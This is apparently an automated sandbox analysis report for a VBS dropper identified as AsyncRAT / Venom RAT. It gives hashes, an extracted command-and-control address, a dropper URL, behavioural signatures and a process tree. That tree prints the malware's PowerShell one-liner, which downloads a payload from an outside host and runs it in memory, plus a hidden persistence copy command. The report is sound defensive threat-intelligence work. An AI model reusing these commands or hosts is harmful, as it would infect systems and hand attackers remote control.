asyncrat | 92d4a215bc6adc95dec27c087a23e307dcebd79b2abcbb76f9f9dc08a70b3e5a

General

Target

RVF002.VBS.vbs
Size

236KB
MD5

7b474b087d336f766ba4cd74067e2786
SHA1

aac3de5ebd60465dabdd78033637819b68d1e91b
SHA256

92d4a215bc6adc95dec27c087a23e307dcebd79b2abcbb76f9f9dc08a70b3e5a
SHA512

e431562d6a08d91075c8498dd88de3c83a7e21bf627263254f3b62e9f9b5493a34f1f942412865e3bd4bc3bcfc4ff2c8f5223aa0fa58601803d1f43451f50dfe
SSDEEP

24:QnODOUWlHllyjOMyE2aL8gVEuMvywFfV7N9Riwnwm43YQ7FYiVLneMDTFv9vPvWE:yKVWtl6OeqyYLQeMHNOSAgHyLKhB

Score

10^/10

asyncrat venom clients rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://schoolcrypter.com/dll_startup

Extracted

Family

asyncrat

Version

Venom RAT 5.0.5

Botnet

Venom Clients

C2

ry8325585.duckdns.org:6087

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/692-137-0x0000000000400000-0x0000000000416000-memory.dmp	asyncrat
behavioral2/memory/692-138-0x00000000004109DE-mapping.dmp	asyncrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
6	4396	powershell.exe
10	4396	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4396 set thread context of 692	4396	powershell.exe	93

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4396	powershell.exe
4396	powershell.exe
2624	powershell.exe
2624	powershell.exe
4396	powershell.exe
4396	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4396	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	692	RegAsm.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 3616 wrote to memory of 4396	3616	WScript.exe	84
PID 3616 wrote to memory of 4396	3616	WScript.exe	84
PID 4396 wrote to memory of 2624	4396	powershell.exe	87
PID 4396 wrote to memory of 2624	4396	powershell.exe	87
PID 4396 wrote to memory of 1352	4396	powershell.exe	92
PID 4396 wrote to memory of 1352	4396	powershell.exe	92
PID 4396 wrote to memory of 1352	4396	powershell.exe	92
PID 4396 wrote to memory of 692	4396	powershell.exe	93
PID 4396 wrote to memory of 692	4396	powershell.exe	93
PID 4396 wrote to memory of 692	4396	powershell.exe	93
PID 4396 wrote to memory of 692	4396	powershell.exe	93
PID 4396 wrote to memory of 692	4396	powershell.exe	93
PID 4396 wrote to memory of 692	4396	powershell.exe	93
PID 4396 wrote to memory of 692	4396	powershell.exe	93
PID 4396 wrote to memory of 692	4396	powershell.exe	93

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RVF002.VBS.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('https://schoolcrypter.com/dll_startup'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('ad6c8d496523-a4ab-b6a4-dbc7-750db9b1=nekot&aidem=tla?txt.qT/o/moc.topsppa.0a726-dspok/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
  2⤵
  - Blocklisted process makes network request
  - Drops startup file
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4396
- - C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2624
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1352
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:692

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
af1cb166ef60425f7f761c7e2a56271c

SHA1
3d24a690ddbe7f2c099aa54198b1af5a0a0fa429

SHA256
b5f5944d0252a0dad2c96e9f46799557f59855169cb1693dc40f1fdfd524bb4f

SHA512
39f8eea604c85b92b98775fd85db519941c7a4c5cc2f1ae4228048a3f1963765d813e79b6ea354a329ad0c220dd1c7d68898affbfcad5d47a5d4a95de86217ce

Download Submit
memory/692-144-0x0000000006090000-0x00000000060F6000-memory.dmp

Filesize
408KB

Download
memory/692-143-0x00000000065D0000-0x0000000006B74000-memory.dmp

Filesize
5.6MB

Download
memory/692-142-0x0000000005F80000-0x000000000601C000-memory.dmp

Filesize
624KB

Download
memory/692-137-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/692-138-0x00000000004109DE-mapping.dmp

Download
memory/2624-135-0x0000000000000000-mapping.dmp

Download
memory/2624-136-0x00007FFF3B820000-0x00007FFF3C2E1000-memory.dmp

Filesize
10.8MB

Download
memory/4396-141-0x00007FFF3B820000-0x00007FFF3C2E1000-memory.dmp

Filesize
10.8MB

Download
memory/4396-132-0x0000000000000000-mapping.dmp

Download
memory/4396-134-0x00007FFF3B820000-0x00007FFF3C2E1000-memory.dmp

Filesize
10.8MB

Download
memory/4396-133-0x000002B837650000-0x000002B837672000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads